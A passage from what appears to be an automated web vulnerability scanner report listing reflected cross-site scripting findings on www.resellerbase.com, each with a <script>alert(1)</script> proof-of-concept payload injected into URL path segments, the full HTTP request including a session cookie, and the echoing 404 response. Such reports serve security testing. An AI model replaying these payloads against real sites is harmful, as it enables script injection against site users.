User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmosb7219<script>alert(1)</script>95896aaa8ac/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1244. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 84696<script>alert(1)</script>b9330668a96 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images84696<script>alert(1)</script>b9330668a96/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images84696<script>alert(1)</script>b9330668a96/rating/ was not found on this server.</p>
...[SNIP]...

2.1245. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c154f<script>alert(1)</script>5d81cab7370 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/ratingc154f<script>alert(1)</script>5d81cab7370/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/ratingc154f<script>alert(1)</script>5d81cab7370/ was not found on this server.</p>
...[SNIP]...

2.1246. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cefff<script>alert(1)</script>216c2b82cf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/rating/?cefff<script>alert(1)</script>216c2b82cf2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/?cefff<script>alert(1)</script>216c2b82cf2=1 was not found on this server.</p>
...[SNIP]...

2.1247. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ef40f<script>alert(1)</script>e30cd32ead6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailef40f<script>alert(1)</script>e30cd32ead6/15/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailef40f<script>alert(1)</script>e30cd32ead6/15/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1248. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae65e<script>alert(1)</script>7a43d6649ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15ae65e<script>alert(1)</script>7a43d6649ff/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15ae65e<script>alert(1)</script>7a43d6649ff/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1249. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d401c<script>alert(1)</script>e09c262f367 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themesd401c<script>alert(1)</script>e09c262f367/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themesd401c<script>alert(1)</script>e09c262f367/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1250. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3c39c<script>alert(1)</script>ce2bc0d6fbc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos3c39c<script>alert(1)</script>ce2bc0d6fbc/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos3c39c<script>alert(1)</script>ce2bc0d6fbc/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1251. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7e735<script>alert(1)</script>6a2405b93a4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images7e735<script>alert(1)</script>6a2405b93a4/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images7e735<script>alert(1)</script>6a2405b93a4/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1252. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d34ab<script>alert(1)</script>2ea96998d78 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/ratingd34ab<script>alert(1)</script>2ea96998d78/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/ratingd34ab<script>alert(1)</script>2ea96998d78/0.gif was not found on this server.</p>
...[SNIP]...

2.1253. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 9c720<script>alert(1)</script>7b8949ae439 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/rating/0.gif9c720<script>alert(1)</script>7b8949ae439 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/0.gif9c720<script>alert(1)</script>7b8949ae439 was not found on this server.</p>
...[SNIP]...

2.1254. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fcd9c<script>alert(1)</script>b8d1d43d3ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/rating/0.gif?fcd9c<script>alert(1)</script>b8d1d43d3ea=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/0.gif?fcd9c<script>alert(1)</script>b8d1d43d3ea=1 was not found on this server.</p>
...[SNIP]...

2.1255. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b58d<script>alert(1)</script>6474145bad1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6b58d<script>alert(1)</script>6474145bad1/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6b58d<script>alert(1)</script>6474145bad1/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1256. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5eaa5<script>alert(1)</script>cab45a9270b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/155eaa5<script>alert(1)</script>cab45a9270b/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/155eaa5<script>alert(1)</script>cab45a9270b/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1257. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9f9c<script>alert(1)</script>2d23a3146e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themesb9f9c<script>alert(1)</script>2d23a3146e2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themesb9f9c<script>alert(1)</script>2d23a3146e2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1258. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8a11<script>alert(1)</script>f699ed02235 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmosf8a11<script>alert(1)</script>f699ed02235/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmosf8a11<script>alert(1)</script>f699ed02235/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1259. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9947c<script>alert(1)</script>04cc6fab287 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images9947c<script>alert(1)</script>04cc6fab287/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images9947c<script>alert(1)</script>04cc6fab287/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1260. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d64f3<script>alert(1)</script>d9f01285b0d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/ratingd64f3<script>alert(1)</script>d9f01285b0d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/ratingd64f3<script>alert(1)</script>d9f01285b0d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1261. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e2a16<script>alert(1)</script>66d0bcc8551 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/images/rating/search.phpe2a16<script>alert(1)</script>66d0bcc8551?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/images/rating/search.phpe2a16<script>alert(1)</script>66d0bcc8551?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1262. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/images/rating/search.php

Issue detail

